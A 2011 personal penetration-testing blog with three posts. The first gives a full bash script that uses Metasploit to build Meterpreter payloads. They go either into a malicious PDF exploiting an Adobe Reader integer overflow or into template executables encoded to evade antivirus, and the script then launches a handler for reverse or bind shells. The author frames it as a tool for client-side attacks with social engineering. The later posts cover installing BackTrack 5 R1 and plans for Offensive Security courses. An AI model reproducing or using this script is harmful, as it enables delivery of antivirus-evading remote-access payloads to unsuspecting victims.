Friday, August 26, 2011

Bash Scripts

I have been practicing more metasploit and bash scripting.  I came up with a quick script for client side exploits.  It is not mind blowing or anything, but it is nice for a quick file with SE. It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure to add to it later but this is just a starting point.  Have to start somewhere....



#! /bin/sh

#This will create a "special" payload for you. Helps when you want to create Meterpreter files fast.... 

echo "Do you need a pdf or exe 'special' payload?"
read special
if [ $special == "pdf" ]; then
    echo "What is the pdf payload, bind_tcp or reverse_tcp?"
    read Payload
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $special == "exe" ]; then
echo "Do you want the file to execute the payload in a separate process? Yes or No?"
read answer
if [ $answer == "Yes" ] || [ $answer == "yes" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -k -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -k -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $answer == "No" ] || [ $answer == "no" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
       
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi
else
    echo "Did not recognize you response. Please run script again. "
fi

else
    echo "Did not recognize you response. Please run script again. "
fi

Monday, August 22, 2011

Backtrack 5 R1

Finished installing Backtrack 5 R1 on the laptop on the SSD drive.  Just to note, I tried.  I tried to use KDE once more and I just cannot do it.  Basket note pads is enough to make anyone who has used it switch but it just wasn't enough.  The GUI just seems cleaner and less of a headache to use.  I am the first person to try to do something the hard way.  Trust me, ask anyone, but it just did not make any sense to me.  It should be more intuitive to use KDE and it just isn't.  I am not in the GUI all the time but when I am, it should be an easy experience.  Why else even use the GUI in the first place.

Anyway, enough of that.  It was great that they did an update to Backtrack 5 since the DNS plugin bug was a bit of a problem.  I found out later that it was only for the x64 bit versions.  That is what I get for rushing to x64 bit.  Also, it is the reason that I simply did not do the "apt-get update && apt-get upgrade && apt-get dist-upgrade".  I installed R1 pretty quickly since they have made the grub installation seamless.  It always finds my Windows installation and configures the dual-boot perfectly.  Definitely a big plus.  On to the Nvidia drivers which was easy enough once you can get the nouveau drivers from loading.  I use the site: "https://wiki.ubuntu.com/X/Troubleshooting/Nouveau".  I was able to CTRL+ALT+BACKSPACE and run the executable.  Sidenote, I love how easy that it to configure in Gnome: System -> Preferences -> Keyboard -> Layouts -> Options -> Key Sequence to kill the X server.  Wonderful. Shot-out to Muts.  I like to add compiz, what can I say.  I cannot help it.  It adds a even bigger cool factor.

Next, I added the usual addons for Firefox after I upgraded it.  Added Chrome and tsclient.  I updated wireshark to 1.7.0 and updated metasploit 4.0 (the usual command svn up).  However, wireshark was a little more complicated.  I found the page "samiux.blogspot.com/2011_07_01_archive.html".  It was very helpful in the install.  Next, I installed VMware Workstation 7 on R1.  Of course, it did not work with the updated kernel on R1.  Luckily, I found the site: "weltall.heliohost.org/wordpress/2011/05/14/running-vmware-workstation-player-on-linux-2-6-39-updated/".  I was able to get VMware running in 2 seconds.  Sweet.  I know I will need that during the OSCE course.  Next, test it with the Alfa wireless adapter.  No problem there.  Next, remove the splash screen during boot-up.   Sometimes, you do not want everyone seeing a big red screen saying Backtrack 5.  Open up VIM and editing grub.cfg took care of that.

It has been a great install on the laptop.  I am sure I will add more to this post later but I just had to say how good Backtrack 5 R1 has been.  Every Linux install has its hiccups but the finished product is what counts.  This is a pretty good end product when you think of what it is suppose to be used for.  It is not OS X or Windows so you will not hear me complain.  Just saying.

Thursday, August 11, 2011

Offensive Security Wireless Professional: OSWP (Post 1)

I am not posting as much as I want on this blog, but I am still giving it a shot.  I just want to recap the past few weeks, I have been preparing for the OSCE course by using exploits in Exploit-DB and re-writing them, from fuzzing to new python scripts to a shell prompt.  It has been fun time.  I was able to install VMware Workstation 7 on BackTrack 5 x64 Gnome.  I have two virtual machines to work on buffer overflows, windows xp sp2 and sp3.  I also have my desktop that has more virtual machines.  That will be essential for the OSCE course I am sure. 

I have also been increasing my reading.  I have been reading "Ghost in the Wires", "Fuzzing", "Shellcoder's Handbook", "Metasploit: Penetration Tester's Guide" and "KingPin".  All of these books are great reads.  I have not finished "Ghost in the Wires" yet but it definitely has my attention.  Kevin Mitnick, Dave Kennedy, HD Moore and Joe McCray are probably my favorite pentesters/hackers. 

In addition, I have started another Offensive Security course: OSWP!!  I ordered the wireless adapter, ALFA AWUS036H.  I have heard good things about the adapter from the EthicalHacker.Net forum.  On the BackTrack 5 forum, there are instructions on loading the Realtek drivers for packet injection.  I am so excited.  Also, I have a Linksys WRT54G wireless access point.  I have registered for the class but I will be paying for it tomorrow.  Hopefully, I can get the PDF's and videos over the weekend.  I will be posting reviews of the modules and the exam as I go.  Nothing too detailed of course ;-).  When I took the OSCP course, I had a great time learning and I do not expect any less from this course. At least, this time, the exam is only 4 hours. :-).  I have been reading www.aircrack-ng.org for awhile now, but never really tried out cracking WEP or WPA.  I foresee a lot of that from now on.  People still use WEP and weak preshared keys for WPA/WPA2.  This will increase my ability to choose a different attack vector during a penetration test.



BackTrack WiFu Online